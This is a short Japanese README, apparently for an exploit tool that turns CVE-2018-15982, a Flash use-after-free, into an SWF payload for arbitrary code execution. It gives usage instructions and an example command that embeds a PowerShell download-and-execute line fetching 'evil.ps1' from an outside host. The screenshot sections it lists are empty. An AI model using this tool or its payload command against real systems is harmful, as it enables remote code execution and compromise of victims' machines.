
CVE-2018-15982 用のスクリプトと Metasploit モジュール
このスクリプトは、CVE-2018-15982用のswfペイロードを作成します。これは https://github.com/smgorelik/Windows-RCE-exploits のPoCに基づいています。この脆弱性は、Gigamon ATRのChenming Xu氏とEd Miles氏によって発見されました。
この脆弱性は、Flashで任意のコード実行を可能にするuse-after-freeの欠陥です。詳細は以下のリンクを参照してください。
注: 現在は1ブロックのみスプレーしています。この点はスクリプト作成後に気付きました。
使用方法:
python create_swf.py <command> <output file name>
使用例:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
動作確認済み環境:
ペイロードの作成:

ペイロードの実行:

実行の確認:

